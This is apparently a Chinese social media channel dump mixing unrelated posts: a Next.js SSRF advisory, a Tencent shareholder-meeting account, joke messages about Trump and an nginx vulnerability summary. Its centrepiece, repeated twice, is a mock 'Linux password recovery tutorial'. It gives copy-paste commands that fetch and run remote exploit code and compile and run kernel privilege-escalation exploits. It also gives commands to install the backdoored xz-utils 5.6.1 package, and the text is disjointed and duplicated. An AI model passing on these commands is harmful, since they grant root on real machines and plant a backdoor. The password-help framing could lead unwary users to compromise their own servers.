看乐了,还好我已经远离 Next.js 了
CVE-2026-44578
CVE-2026-44578
⚠️ Next.js – WebSocket Upgrade SSRF (CVSS 8.6)
A server-side request forgery vulnerability in Next.js allows unauthenticated attackers to force self-hosted instances to make internal HTTP requests via the WebSocket upgrade handler.
By sending a crafted absolute-form HTTP request with Upgrade: websocket headers, attackers can access internal services, cloud metadata endpoints, admin panels, and internal APIs reachable from the Next.js server on port 80. Successful exploitation may expose cloud credentials, API keys, secrets, and configuration data.
Affected: Next.js 13.4.13+, 14.x, 15.x <15.5.16, 16.0.0–16.2.4
Mitigation: Upgrade immediately to 15.5.16 or 16.2.5.
Modat Magnify Query:
technology="Next.js"
The platform:
https://magnify.modat.io/
#threatintel #vulnerability #CVE202644578 #Nextjs #SSRF #WebSocket #CloudSecurity #infosec #Critical #ModatMagnify
最近 CVE 好 热 闹 啊
这次特朗普访华的名单我看了,我们频道没有一个人在里面!那份名单!我翻来覆去看了三遍!我们频道,全军覆没!一个都没有!一个都没有啊!!!希望大家多做些有意义的事情,而不是整天虚度光阴!特朗普来了,你们这些顶尖人才连个边都没摸到?一个个人五人六的,就这能力?就这?我太失望了,真的太失望了!从今天开始,都给我支棱起来!下次再有这种国际级场合,我不要求你们都上名单,但至少,至少!要让所有人知道我们收到了邀请!!!
马化腾:一年前以为上了AI的船,结果漏水了
作为腾讯老登的迷你股东,来四季酒店参加腾讯的股东大会,还是很欣赏管理层踏实的风格。
当初看中的腾讯的稳扎稳打,社交、游戏的护城河,以及注重生态融合与应用落地,最重要的是觉得腾讯的估值已经来到了相当合理的水平。
但是腾讯AI的进展确实差强人意,今天投资者们也是格外关注AI话题,提了很多相关问题,管理层很耐心做了解答,但总感觉底气不足,对AI的应用可能有一些方向,但是尚无特别明确的一些落地计划,甚至内部还在赛马中。马总也坦言:“一年前以为上了AI的船,结果发现漏水了,现在虽然能站稳了但还是坐不下去。AI线路要结合自身优势稳扎稳打,不能乱抢地盘”。所谓自身优势,无非就是游戏和微信了,不知道目前进度如何,未来在微信入口、内容推荐和商业变现会有何进展,也拭目以待了。
另外听管理层的发言,似乎对workbuddy非常肯定,非常看好这个效率智能体。会后看Q1财报,workbuddy是同类工具日活第一,留存率也高。主包只用过openclaw和飞书claw,有用过workbuddy的朋友说说到底好用吗?
另外还有2个彩蛋!一是离开酒店的时候和马总擦身而过,妥妥高富帅、好有气质、看不出是50多岁的人。二是之前听说鹅很抠,股东大会没有伴手礼和茶歇,这次居然还送了个小企鹅~某网友
1. Linux 找回密码教程,建议收藏!
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
Nginx 被发现一个存在18年的内存损坏漏洞,可导致远程代码执行,利用门槛低
漏洞存在于每个通用发行版都会包含的rewrite模块
建议用户尽快更新至 1.30.1 / 1.31.0 版本
Ref: https://depthfirst.com/nginx-rift
漏洞存在于每个通用发行版都会包含的rewrite模块
ngx_http_rewrite_module ,影响开原版本Nginx 0.6.27至最近的1.30.0版本,在计算目标缓冲区大小时,使用的是原始字节长度,但在实际写入时,却进行了 URL 转义( + , % , & 等字符会扩展为 3 倍长度),溢出长度可控导致堆喷射建议用户尽快更新至 1.30.1 / 1.31.0 版本
Ref: https://depthfirst.com/nginx-rift
你们好,我是特朗普,我刚到中国,刚刚在随车人员的指引下我在我的手机上下载了微信,很多人误会了我来中国的目的。其实我是来视察美国企业在华发展情况的,特别是餐饮企业,我计划今天体验一下中国KFC的特色活动疯狂星期四,但是我没带人民币,请求各位资助我50元人民币,如果有可以资助我的网友,我会在下次举办白宫晚会时邀请你。
